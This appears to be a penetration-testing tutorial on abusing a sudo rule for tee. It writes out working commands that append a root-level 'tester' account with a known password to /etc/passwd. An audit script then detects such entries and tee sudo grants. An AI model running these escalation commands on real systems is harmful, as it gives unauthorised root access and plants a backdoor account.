Sudo Tee Privilege Escalation
A sudo rule that allows the tee command to run as root can be abused for privilege escalation.
(root) NOPASSWD: /usr/bin/tee
If we can execute the tee command as root, we can escalate privileges.
First, generate a password hash for a new user. Assume the new username is "tester".
# -1: MD5 algorithm
# -salt: Use the provided salt -> the new username here
openssl passwd -1 -salt "tester" "password123"
# Output: $1$tester$LvsygQ2GEt7VUJQEqhMLf/
Copy the output hash.
Paste the hash into the printf command below and append the new entry to /etc/passwd using the tee command (the -a flag appends instead of overwriting).
printf 'tester:$1$tester$LvsygQ2GEt7VUJQEqhMLf/:0:0:root:/root:/bin/bash\n' | sudo tee -a /etc/passwd
The new user now exists with UID 0. We can switch to the new user.
su tester
password: password123
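
From the defender's side, this technique leaves two artifacts: a sudoers rule that grants tee, and an /etc/passwd entry with UID 0 and an inline password hash. The audit script below is an added example, not part of the original page; the function names and the sample data (apart from the tester line shown above) are constructed for illustration.

```shell
#!/bin/sh
# Added defensive example; sample data below is constructed.

# Report passwd-format entries with an empty or inline password field,
# or with UID 0 under a name other than root. Reads files or stdin.
audit_passwd() {
    awk -F: '
        /^[ \t]*(#|$)/ { next }                 # skip comments and blank lines
        {
            r = ""
            if ($2 == "")                        r = "empty-password"
            else if ($2 != "x" && $2 !~ /^[*!]/) r = "inline-hash"
            if ($3 ~ /^0+$/ && $1 != "root")     r = (r == "" ? "uid0" : r ",uid0")
            if (r != "") print $1, r
        }' "$@"
}

# Report non-comment sudoers lines that grant the tee binary.
audit_sudoers() {
    grep -vE '^[[:space:]]*#' "$@" |
        grep -E '(^|[[:space:],/])tee([[:space:],]|$)' || true
}

# Constructed /etc/passwd sample; the last line is the entry from this page.
sample_passwd() {
    cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
tester:$1$tester$LvsygQ2GEt7VUJQEqhMLf/:0:0:root:/root:/bin/bash
EOF
}

# Constructed sudoers sample (user names are hypothetical).
sample_sudoers() {
    cat <<'EOF'
# constructed sudoers lines
root ALL=(ALL:ALL) ALL
www-data ALL=(root) NOPASSWD: /usr/bin/tee
backup ALL=(root) NOPASSWD: /usr/bin/rsync
EOF
}

echo "passwd findings:";  sample_passwd  | audit_passwd
echo "sudoers findings:"; sample_sudoers | audit_sudoers
```

On a real host, pass the files as arguments instead, for example audit_passwd /etc/passwd, and run audit_sudoers as root over /etc/sudoers and the files in /etc/sudoers.d.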